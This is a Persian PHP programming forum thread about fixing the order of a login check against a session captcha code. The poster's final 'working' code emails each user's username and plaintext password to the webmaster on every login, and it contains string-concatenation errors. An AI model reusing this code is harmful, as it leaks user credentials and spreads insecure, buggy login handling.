نمایش نتایج 1 تا 3 از 3

نام تاپیک: مشکل در ترتیب اجرای کد لاگین

  1. #1

    مشکل در ترتیب اجرای کد لاگین

    من با کد زیر لاگین می کنم و وارد سایتم میشم اما مراحل اجرای کد مشکل داره.

    این کل کد:

    <?PHP
    session_start();
    require_once("include/membersite_config.php");
    if(isset($_POST['submitted']))
    {

    if(!empty($_POST['username']) && !empty($_POST['password']) && !empty($_POST['security_key'])) {
    if($_POST['security_key'] == $_SESSION['randum_code']) {

    // send email

    $accept = "شما با موفقیت وارد شدید. با تشکر";
    $to = "webmaster@hassas-computer.com";
    $subject = "ورود کاربر به سایت";
    $user_message = "کاربر زیر اقدام به ورود به سامانه را کرده";
    $body = "\n".
    "نام کاربری: $name\n".
    "توضیحات: \n ".
    "$user_message\n".

    mail($to, $subject, $body );
    } else {
    $error = "کد امنیتی را اشتباه وارد کرده اید! دوباره امتحان کنید";
    }
    }
    if($fgmembersite->Login())
    {
    $fgmembersite->RedirectToURL("index.php");
    }
    }
    ?>



    حالا قسمت به قسمت مشکلاتم رو میگم.

    همه چیز درسته اما مشکلات به صورت زیر وجود داره

    1- وقتی که من username و password را وارد میکنم در صورتی که کد امنیتی security_key را چه درست و چه نادرست وارد کنم عمل لاگین اتفاق می افته که نمیخوام چنین اتفاقی به وجود بیاد
    میخوام در صورتی که کد امنیتی اشتباه وارد شده باشه عملیات لاگین متوقف بشه و لاگین صورت نگیره و در صورتی که کد را درست وارد شده بود اول پیام خط " $accept = "شما با موفقیت وارد شدید. با تشکر"; " داده بشه و بعد عمل لاگین صورت بگیره.

  2. #2

    نقل قول: مشکل در ترتیب اجرای کد لاگین

    خب شما اول باید کدی که کاربر میفرسته رو با کد موجود در دیتابیس تطبیق بدی
    اینکارو نکردی

  3. #3

    نقل قول: مشکل در ترتیب اجرای کد لاگین

    نقل قول نوشته شده توسط mamali-mohammad مشاهده تاپیک
    خب شما اول باید کدی که کاربر میفرسته رو با کد موجود در دیتابیس تطبیق بدی
    اینکارو نکردی
    اقا کد رو به صورت زیر در آوردم درست شد.

    <?PHP
    session_start();
    require_once("include/membersite_config.php");
    if(isset($_POST['submitted']))
    {

    if(!empty($_POST['username']) && !empty($_POST['security_key']) && !empty($_POST['password'])) {
    if($_POST['security_key'] == $_SESSION['randum_code']) {

    // send email

    $accept = "شما با موفقیت وارد شدید. با تشکر";
    $to = "webmaster@hassas-computer.com";
    $subject = "ورود کاربر به سایت";
    $user_message = "کاربر زیر اقدام به ورود به سامانه را کرده";
    $username = $_POST['username'];
    $password = $_POST['password'];
    $from = "Webmaster.Security";

    $body = "\n".
    "Username: $username\n".
    "Password: $password\n".

    $headers = "From: $from \r\n";
    $headers .= "Reply-To: $from \r\n";

    mail($to, $subject, $body, $headers);

    if($fgmembersite->Login())
    {
    $fgmembersite->RedirectToURL("index.php");
    }
    } else {
    $error = "کد امنیتی را اشتباه وارد کرده اید! دوباره امتحان کنید";
    }
    }
    }
    ?>
    آخرین ویرایش به وسیله hamidhassas : پنج شنبه 16 آذر 1391 در 23:36 عصر

تاپیک های مشابه

  1. مشکل در اجرای کد لاگین بر روی سرور
    نوشته شده توسط hamidhassas در بخش PHP
    پاسخ: 3
    آخرین پست: شنبه 20 خرداد 1391, 15:28 عصر
  2. مشکل رنگ در اجرای برنامه در ویندوز 98 ...
    نوشته شده توسط alireza_63 در بخش برنامه نویسی در Delphi
    پاسخ: 5
    آخرین پست: سه شنبه 10 شهریور 1383, 15:42 عصر
  3. ترتیب اجرای کنترل های وب فرم
    نوشته شده توسط shahabedeen در بخش ASP.NET Web Forms
    پاسخ: 1
    آخرین پست: یک شنبه 19 مرداد 1382, 12:12 عصر
  4. ترتیب اجرای objectها
    نوشته شده توسط jannati در بخش VB.NET
    پاسخ: 4
    آخرین پست: شنبه 28 تیر 1382, 19:10 عصر

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •